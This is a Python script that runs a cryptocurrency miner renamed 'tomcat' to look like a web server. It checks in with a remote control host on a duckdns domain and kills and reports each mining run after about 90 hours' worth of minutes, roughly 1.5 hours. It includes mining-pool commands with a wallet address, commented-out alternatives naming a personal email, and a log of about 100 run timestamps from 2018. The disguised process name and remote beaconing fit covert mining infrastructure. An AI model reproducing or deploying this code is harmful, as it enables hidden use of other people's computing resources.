import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:39:07.060830
#2018-02-17 16:27:06.059372
#2018-02-17 18:16:07.082379
#2018-02-17 20:04:01.895157
#2018-02-17 21:52:06.016157
#2018-02-17 23:37:04.764569
#2018-02-18 01:26:04.984220
#2018-02-18 03:13:05.690768
#2018-02-18 05:02:06.299966
#2018-02-18 06:55:01.868718
#2018-02-18 08:43:06.029814
#2018-02-18 10:29:06.048823
#2018-02-18 12:15:07.237097
#2018-02-18 14:02:03.914310
#2018-02-18 15:52:06.245217
#2018-02-18 17:42:02.040509
#2018-02-18 19:29:01.507165
#2018-02-18 21:14:05.968757
#2018-02-18 23:02:07.240814
#2018-02-19 00:49:01.996278
#2018-02-19 02:36:03.758205
#2018-02-19 04:22:01.398161
#2018-02-19 06:08:07.719149
#2018-02-19 07:57:04.870681
#2018-02-19 09:48:05.406043
#2018-02-19 11:38:06.210772
#2018-02-19 13:25:01.813217
#2018-02-19 15:12:01.316327
#2018-02-19 17:02:09.341608
#2018-02-19 18:48:05.269257
#2018-02-19 20:35:03.077475
#2018-02-19 22:21:04.576654
#2018-02-20 00:07:05.213207
#2018-02-20 01:53:05.396072
#2018-02-20 03:43:06.367516
#2018-02-20 05:28:05.363832
#2018-02-20 07:12:06.027196
#2018-02-20 08:58:06.708287
#2018-02-20 10:42:04.614709
#2018-02-20 12:28:06.022325
#2018-02-20 14:16:04.432964
#2018-02-20 15:59:02.147895
#2018-02-20 17:46:07.731462
#2018-02-20 19:38:06.329758
#2018-02-20 21:24:06.170159
#2018-02-20 23:08:06.912107
#2018-02-21 00:53:04.513587
#2018-02-21 02:37:07.989870
#2018-02-21 04:26:04.382187
#2018-02-21 06:13:07.111664
#2018-02-21 07:59:04.046099
#2018-02-21 09:45:02.765982
#2018-02-21 11:34:11.598242
#2018-02-21 13:23:08.039658
#2018-02-21 15:07:07.527124
#2018-02-21 16:56:04.496314
#2018-02-21 19:58:02.144250
#2018-02-21 21:45:07.149761
#2018-02-21 23:33:02.119005
#2018-02-22 01:19:06.733799
#2018-02-22 03:09:01.348213
#2018-02-22 04:54:01.765666
#2018-02-22 06:39:04.631743
#2018-02-22 08:28:04.288104
#2018-02-22 10:15:08.490859
#2018-02-22 12:01:13.376137
#2018-02-22 13:47:05.879850
#2018-02-22 15:34:05.980823
#2018-02-22 17:20:10.285717
#2018-02-22 19:07:04.506564
#2018-02-22 20:59:06.552670
#2018-02-22 22:45:08.118313
#2018-02-23 00:34:04.882515
#2018-02-23 02:22:02.150349
#2018-02-23 04:11:04.373866
#2018-02-23 05:56:04.079982
#2018-02-23 07:46:05.699125
#2018-02-23 09:52:03.288746
#2018-02-23 11:58:07.756277
#2018-02-23 13:47:05.781283
#2018-02-23 15:36:05.831246
#2018-02-23 17:24:08.251803
#2018-02-23 19:11:01.246623
#2018-02-23 20:55:06.936340
#2018-02-23 22:43:02.136774
#2018-02-24 00:31:04.160969
#2018-02-24 02:22:04.879286
#2018-02-24 04:12:01.228408
#2018-02-24 06:00:07.838045
#2018-02-24 07:48:01.632771
#2018-02-24 09:31:07.528897
#2018-02-24 11:26:06.468484
#2018-02-24 13:15:07.550941
#2018-02-24 15:06:05.303082
#2018-02-24 16:55:07.342695
#2018-02-24 18:44:04.380082
#2018-02-24 20:35:05.701583
#2018-02-24 22:39:05.227628
#2018-02-25 01:46:06.883579
#2018-02-25 04:50:01.346155
#2018-02-25 08:12:07.386182